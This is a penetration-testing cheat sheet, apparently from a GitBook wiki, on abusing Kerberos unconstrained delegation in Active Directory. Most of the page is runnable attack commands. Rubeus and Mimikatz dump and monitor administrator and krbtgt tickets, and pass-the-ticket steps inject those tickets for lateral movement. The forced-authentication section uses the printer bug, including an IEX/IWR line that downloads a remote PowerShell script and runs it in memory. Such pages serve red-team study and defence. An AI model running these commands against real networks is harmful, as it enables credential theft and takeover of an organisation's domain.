Unconstrained Delegation

Link: https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/credential-access/steal-or-forge-kerberos-tickets/unconstrained-delegation

Requirements

Elevated privileges on the host that is configured for Unconstrained Delegation

Domain Controllers will always have TrustedForDelegation enabled!

Description

Kerberos delegation in Active Directory refers to the ability of an object, such as a user or computer, to reuse end-user credentials for accessing resources hosted on a different server.

Unconstrained Delegation occurs when a computer, such as a File Server, has the "Trust this computer for delegation to any service" option enabled, and a Domain Administrator logs into the File Server. This enables us to grab a copy of the Domain Administrator's TGT, which can be used to authenticate anywhere in the Domain.

Explanation

WITHOUT Unconstrained Delegation

When a system is not configured for unconstrained delegation, typically only a Ticket Granting Service (TGS) ticket for the relevant service is stored on the system when a user authenticates through Kerberos. This ticket can only be used to authenticate to the same service on that same system and cannot be used to authenticate to other services or systems within the domain.

WITH Unconstrained Delegation

When a system is configured for Unconstrained Delegation and a user, such as the Domain Administrator, connects to the system through a protocol like WinRM or CIFS, the TGT for the user account may be stored on the system.

If an attacker can gain access to this TGT, either by compromising the system or using other techniques, they can potentially use it to impersonate the user and access resources anywhere in the domain. This is known as a Pass-the-Ticket (PtT) attack.

Enumeration

1) Powerview

Get-DomainComputer -Unconstrained -Properties dnshostname,samaccountname |FL

2) Powershell

Get-ADComputer -Filter {TrustedForDelegation -eq $true} | Select DNSHostName,SamAccountName | FL

Ticket Acquisition

1) Rubeus (Binary)

Triage for existing tickets

Rubeus.exe triage

Dump tickets for selected user,service or LUID

Rubeus.exe dump /nowrap /user:administrator
Rubeus.exe dump /nowrap /service:krbtgt
Rubeus.exe dump /nowrap /luid:0x6ee60

Monitor for and dump new tickets

Rubeus.exe monitor interval:15 /nowrap
Rubeus.exe monitor interval:15 /nowrap /targetuser:administrator

2) Invoke-Rubeus

Triage for existing tickets

Invoke-Rubeus -Command "triage"

Dump tickets for selected user,service or LUID

Invoke-Rubeus -Command "dump /nowrap /user:administrator"
Invoke-Rubeus -Command "dump /nowrap /service:krbtgt"
Invoke-Rubeus -Command "dump /nowrap /luid:0x6ee60"

Monitor for and dump new tickets

Invoke-Rubeus -Command "monitor interval:15 /nowrap"
Invoke-Rubeus -Command "monitor interval:15 /nowrap /targetuser:administrator"

3) Mimikatz

Export tickets (Preferred Method (More Accurate))

mimikatz.exe "token::elevate" "sekurlsa::tickets /export"

Alternative Method

mimikatz.exe "token::elevate" "kerberos::list /export"

4) Invoke-Mimikatz

Export tickets (Preferred Method (More Accurate))

Invoke-Mimikatz -Command '"token::elevate "sekurlsa::tickets /export"'

Alternative Method

Invoke-Mimikatz -Command '""token::elevate" "kerberos::list /export"'

Pass the Ticket (PtT)

1) Rubeus (Binary)

Method 1: Pass ticket into seperate session (Preferred)

Create new LUID session (Requires Elevation)

Rubeus.exe createnetonly /program:c:\windows\system32\cmd.exe /show

Pass ticket into new session

Rubeus.exe ptt /luid:[LUID from previous command] /ticket:[Base64 ticket]

Method 2: Pass ticket directly into current session (Can cause auth issues)

Rubeus.exe ptt /ticket:[Base64 ticket]

2) Invoke-Rubeus

Method 1: Pass ticket into seperate session (Preffered)

Create new LUID session (Requires Elevation)

Invoke-Rubeus -Command "createnetonly /program:c:\windows\system32\cmd.exe /show"

Pass ticket into new session

Invoke-Rubeus -Command "ptt /luid:[LUID from previous command] /ticket:[Base64 ticket]"

Method 2: Pass ticket directly into current session (Can cause auth issues)

Invoke-Rubeus -Command "ptt /ticket:[Base64 ticket]"

3) Mimikatz

Pass ticket into current session

kerberos::ptt [Ticket-Name.kirbi]

Confirm if ticket has been stored

kerberos::list

Open new session with injected ticket

misc::cmd

4) Invoke-Mimikatz

Pass ticket into current session

Invoke-Mimikatz -Command '"kerberos::ptt [Ticket-Name.kirbi]"'

Confirm if ticket has been stored

Invoke-Mimikatz -Command '"kerberos::list"'

Open new session with injected ticket

Invoke-Mimikatz -Command '"misc::cmd"'

Then proceed with lateral movement using WinRM for example

Enter-PSSession -ComputerName DC01.security.local

Forced Authentication

When a system has Unconstrained Delegation enabled, a potential attack vector is to force other users or systems to authenticate against the host which is configured for unconstrained delegation.

By doing so we can force the victim user / computer account to store a copy of their TGT into the compromised system.

Printer Bug https://raw.githubusercontent.com/NotMedic/NetNTLMtoSilverTicket/master/Get-SpoolStatus.ps1

Enumerate for vulnerable servers

PowerView

Get all computers

Get-DomainComputer -Properties DnsHostName,OperatingSystem | Where {$_.OperatingSystem -Notlike "*server*"} | Select DnsHostname | Out-File DomainComputers.txt -Encoding "ASCII"

Get all servers

Get-DomainComputer -Properties DnsHostName,OperatingSystem | Where {$_.OperatingSystem -like "*server*"} | Select DnsHostname | Out-File DomainServers.txt -Encoding "ASCII"

Get-SpoolStatus ForEach ($Server in Get-Content DomainServers.txt) {Get-SpoolStatus $Server}

Set Rubeus for ticket harvesting

Rubeus.exe monitor /Interval:5 /nowrap
Rubeus.exe monitor /Interval:5 /nowrap /targetuser:DC01

Invoke-Rubeus -Command "monitor /Interval:5 /nowrap"
Invoke-Rubeus -Command "monitor /Interval:5 /nowrap /targetuser:DC01"

Perform Forced Authentication

1) Invoke-SpoolSample

Load into memory

IEX (IWR -UseBasicParsing https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Spoolsample.ps1)

Execute

Invoke-SpoolSample -Command "[Target Sever] [Listening Host]"

2) SharpSpoolTrigger https://github.com/cube0x0/SharpSystemTriggers

Execute

SharpSpoolTrigger.exe [Target Sever] [Listening Host]

Collect Ticket for Profit! Impersonate this using Pass the Ticket.

PreviousUnPAC the hash NextKnown Vulnerabilities

Last updated 8 months ago

hashtagRequirements

hashtagDomain Controllers will always have TrustedForDelegation enabled!

hashtagDescription

hashtagExplanation

hashtagWITHOUT Unconstrained Delegation

hashtagWITH Unconstrained Delegation

hashtagEnumeration

hashtag1) Powerview

hashtag2) Powershell

hashtagTicket Acquisition

hashtag1) Rubeus (Binary)

hashtag2) Invoke-Rubeus

hashtag3) Mimikatz

hashtag4) Invoke-Mimikatz

hashtagPass the Ticket (PtT)

hashtag1) Rubeus (Binary)

hashtag2) Invoke-Rubeus

hashtag3) Mimikatz

hashtag4) Invoke-Mimikatz

hashtagForced Authentication

hashtagPrinter Bug https://raw.githubusercontent.com/NotMedic/NetNTLMtoSilverTicket/master/Get-SpoolStatus.ps1

hashtagEnumerate for vulnerable servers

hashtagPowerView

hashtagSet Rubeus for ticket harvesting

hashtagPerform Forced Authentication

hashtag1) Invoke-SpoolSample

hashtag2) SharpSpoolTrigger https://github.com/cube0x0/SharpSystemTriggers

hashtagCollect Ticket for Profit! Impersonate this using Pass the Ticket.

Requirements

Domain Controllers will always have TrustedForDelegation enabled!

Description

Explanation

WITHOUT Unconstrained Delegation

WITH Unconstrained Delegation

Enumeration

1) Powerview

2) Powershell

Ticket Acquisition

1) Rubeus (Binary)

2) Invoke-Rubeus

3) Mimikatz

4) Invoke-Mimikatz

Pass the Ticket (PtT)

1) Rubeus (Binary)

2) Invoke-Rubeus

3) Mimikatz

4) Invoke-Mimikatz

Forced Authentication

Printer Bug https://raw.githubusercontent.com/NotMedic/NetNTLMtoSilverTicket/master/Get-SpoolStatus.ps1

Enumerate for vulnerable servers

PowerView

Set Rubeus for ticket harvesting

Perform Forced Authentication

1) Invoke-SpoolSample

2) SharpSpoolTrigger https://github.com/cube0x0/SharpSystemTriggers

Collect Ticket for Profit! Impersonate this using Pass the Ticket.